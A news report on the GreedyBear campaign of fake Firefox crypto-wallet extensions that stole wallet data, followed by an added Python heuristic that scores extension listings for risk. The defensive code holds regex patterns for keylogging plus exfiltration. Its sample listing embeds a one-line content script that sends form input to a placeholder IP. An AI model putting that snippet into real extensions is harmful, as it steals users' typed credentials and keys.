
Analysts at Koi Security discovered the malicious GreedyBear campaign, which is active in the Mozilla add-ons store. 150 malicious Firefox extensions have stolen cryptocurrency worth over $1 million from users.
Fraudulent extensions disguised themselves as popular crypto wallet extensions of well-known platforms, including MetaMask, TronLink, Exodus, and Rabby Wallet. Initially, they were uploaded to the store without malicious code to pass inspections and remained inactive for some time to accumulate fake positive reviews.

At a later stage of the attack, the extension publishers removed the original branding, replaced it with new names and logos, and injected malicious code designed to steal wallet data and users’ IP addresses (likely for tracking or targeting purposes).
The malicious code acted as a keylogger, intercepting input data from form fields and pop-up windows, and then sending it to the attackers’ server.
Experts from Koi Security have notified Mozilla developers about their findings, and the malicious extensions have now been removed from the Firefox add-ons store.
However, researchers report that, in addition to the Firefox extensions, the operation relies on dozens of Russian-language sites offering pirated software, which distribute some 500 different malware executables, as well as a network of sites posing as official resources of Trezor, Jupiter Wallet, and fake hardware wallet repair services.

All these sites are linked to a single IP address (185.208.156[.]66), which acts as a command server for GreedyBear.
Through these channels, the malicious payload can be a trojan, an info-stealer (such as Lumma), or even ransomware.
The report also mentions that the analysis of this campaign revealed clear artifacts indicating that the attackers are using AI.
“This allows attackers to scale their operations faster and easier than ever before, diversify their payloads, and evade detection,” experts write.
Additionally, the company warned that the GreedyBear operators are clearly preparing to distribute malware through the Chrome Web Store as well: researchers have already found a malicious Chrome extension named Filecoin Wallet that used the same data-stealing logic and communicated with the same IP address.
It is worth noting that in June 2025, Mozilla developers introduced a new system for early detection of add-ons linked to cryptocurrency scams. It builds a risk profile for each wallet extension in the store and automatically raises a warning when a set threshold is reached.
These warnings prompt add-on reviewers to examine the flagged extensions more closely, so that malware can be removed from the store before it is used to drain users’ wallets.
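The following is an added illustration, not Mozilla's actual scoring system and not code from the Koi Security report: a heuristic risk profile for wallet-extension listings that models the GreedyBear tactics described above (brand impersonation, a dormant review-farming period, a late rename, and an update that adds input capture plus exfiltration to a hard-coded IP host). All factors, weights, the threshold, and the sample listing are assumptions constructed for the example.

```python
import re
from dataclasses import dataclass, field

# Heuristic risk profile for wallet-extension listings (assumed factors and
# threshold; illustrative, not Mozilla's actual scoring system).
WALLET_BRANDS = ("metamask", "tronlink", "exodus", "rabby", "trezor", "jupiter")
RISK_THRESHOLD = 6  # assumed score at which add-on reviewers are alerted

@dataclass
class Listing:
    name: str
    publisher: str
    reviews: int
    days_listed: int
    renamed_recently: bool
    permissions: list = field(default_factory=list)
    content_script: str = ""

def brand_impersonation(name: str, publisher: str) -> bool:
    # Listing name echoes a known wallet brand that the publisher name lacks.
    n, p = name.lower(), publisher.lower()
    return any(b in n and b not in p for b in WALLET_BRANDS)

def keylogger_with_exfil(js: str) -> bool:
    # Input/keystroke listener combined with a request to a hard-coded IP host.
    captures = re.search(r"addEventListener\(\s*['\"](?:keydown|keyup|input)['\"]", js)
    exfil = re.search(r"fetch\(\s*['\"]https?://\d{1,3}(?:\.\d{1,3}){3}\b", js)
    return bool(captures and exfil)

def risk_score(lst: Listing) -> int:
    score = 3 if brand_impersonation(lst.name, lst.publisher) else 0
    score += 2 if lst.renamed_recently else 0                        # late rebranding
    score += 1 if lst.days_listed < 90 and lst.reviews > 50 else 0   # review farming
    score += 1 if "<all_urls>" in lst.permissions else 0             # broad host access
    score += 4 if keylogger_with_exfil(lst.content_script) else 0    # capture + exfil
    return score

def needs_review(lst: Listing) -> bool:
    return risk_score(lst) >= RISK_THRESHOLD

# Constructed sample listing (TEST-NET address, not a real indicator).
SAMPLE = Listing(
    name="MetaMask Secure Wallet", publisher="wallet-tools-dev", reviews=120,
    days_listed=45, renamed_recently=True, permissions=["<all_urls>", "storage"],
    content_script="document.addEventListener('input', e => "
                   "fetch('http://203.0.113.10/c', {method:'POST', body:e.target.value}));",
)

if __name__ == "__main__":
    print(risk_score(SAMPLE), needs_review(SAMPLE))  # 11 True
```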
